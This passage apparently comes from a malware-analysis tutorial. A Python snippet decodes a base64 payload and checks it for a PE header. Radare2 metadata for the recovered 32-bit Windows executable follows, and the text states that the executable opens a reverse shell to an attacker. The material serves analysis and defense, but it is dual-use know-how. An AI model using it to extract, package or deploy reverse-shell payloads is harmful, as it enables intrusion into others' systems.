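    sample = base64.b64encode(b"MZ\x90\x00" + bytes(8)).decode("ascii")
    payload = decode_payload(sample)
    print(looks_like_pe(payload))  # prints: True
```

Writing the decoded bytes to a file, for example with open("msf.dat", "wb"), allows the result to be inspected with other tools.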
Checking the Windows executable with Radare2 shows the following
❯ r2 msf.dat
[0x00407354]> i
fd 3
file msf.dat
size 0x1204a
humansz 72.1K
mode r-x
format pe
iorw false
blksz 0x0
block 0x100
type EXEC (Executable file)
arch x86
baddr 0x400000
binsz 73802
bintype pe
bits 32
canary false
retguard false
class PE32
cmp.csum 0x000125dd
compiled Tue Apr 14 04:46:43 2009
crypto false
dbg_file C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb
endian little
havecode true
hdr.csum 0x00000000
guid 4AC180361
laddr 0x0
lang c
linenum true
lsyms true
machine i386
maxopsz 16
minopsz 1
nx false
os windows
overlay true
cc cdecl
pcalign 0
pic false
relocs true
signed false
sanitiz false
static false
stripped false
subsys Windows GUI
va true
The binary analysis is out of the scope of this documentation; however, the executable establishes a reverse shell back to the attacker.